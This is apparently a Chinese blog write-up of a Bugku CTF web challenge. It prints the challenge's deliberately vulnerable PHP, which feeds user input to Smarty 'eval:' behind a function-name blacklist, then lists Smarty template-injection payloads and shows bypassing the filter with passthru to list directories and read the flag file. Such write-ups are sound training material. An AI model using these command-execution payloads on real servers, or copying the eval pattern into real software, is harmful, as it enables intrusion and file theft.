bugku 聪明的php

最新推荐文章于 2024-04-02 00:09:11 发布

星星明亮

最新推荐文章于 2024-04-02 00:09:11 发布

阅读量194

点赞数 1

分类专栏： bugku CTF web

本文链接：https://blog.csdn.net/weixin_46578840/article/details/119184473

版权

CTF 同时被 3 个专栏收录

73 篇文章 1 订阅

订阅专栏

bugku

69 篇文章 0 订阅

订阅专栏

web

25 篇文章 2 订阅

订阅专栏

打开网址得到一句话
在这里插入图片描述
传入参数a=得到一串代码，应该是确实为smarty模板注入

常用payload
{if phpinfo()}{/if}
{if system(‘ls’)}{/if}
{if readfile(’/flag’)}{/if}
{if show_source(’/flag’)}{/if}
{if system(‘cat …/…/…/flag’)}{/if}
smarty中的{if}标签中可以执行php语句

<?php
include('./libs/Smarty.class.php');
echo "pass a parameter and maybe the flag file's filename is random :>";
$smarty = new Smarty();
if($_GET){
    highlight_file('index.php');
    foreach ($_GET AS $key => $value)
    {
        print $key."\n";
        if(preg_match("/flag|\/flag/i", $value)){
            
            $smarty->display('./template.html');


        }elseif(preg_match("/system|readfile|gz|exec|eval|cat|assert|file|fgets/i", $value)){


            $smarty->display('./template.html');            
            
        }else{
            $smarty->display("eval:".$value);
        }
        
    }
}
?> 

//system|readfile|gz|exec|eval|cat|assert|file|fgets/，这些函数都被过滤了，但是发现passthru()函数没过滤

构造payload：{if passthru('ls')}{/if}  //查看当前目录，啥也没有，
构造payload：{if passthru('ls ../.././')}{/if}  //进行三级目录穿越到根目录发现有一个_9909的文件
构造payload：{if passthru('tac /_9909')}{/if} //得到flag

在这里插入图片描述

星星明亮

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
bugku 聪明的php

打开网址得到一句话传入参数a=得到一串代码，应该是确实为smarty模板注入常用payload{if phpinfo()}{/if}{if system(‘ls’)}{/if}{if readfile(’/flag’)}{/if}{if show_source(’/flag’)}{/if}{if system(‘cat …/…/…/flag’)}{/if}smarty中的{if}标签中可以执行php语句<?phpinclude('./libs/Smarty.class.php')
复制链接

扫一扫